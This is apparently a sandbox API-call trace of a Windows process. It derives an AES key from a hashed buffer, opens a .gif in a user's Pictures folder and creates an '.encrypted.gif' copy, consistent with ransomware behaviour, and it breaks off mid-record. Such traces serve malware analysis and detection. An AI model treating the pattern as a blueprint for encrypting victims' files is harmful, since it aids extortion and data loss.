[0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.707] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.707] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.707] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.707] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.707] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0039.708] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.709] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.709] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.709] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.709] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.710] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.710] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.710] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.710] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.710] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.710] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.710] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.711] CryptHashData (hHash=0x7c2100, pbData=0x7c97b8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.711] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.711] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.711] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.711] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.712] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.712] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.712] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\77o ybs-vwsh8x3oiij.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.712] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.712] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97b8 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97b8 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.714] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\77o ybs-vwsh8x3oiij.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.716] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) 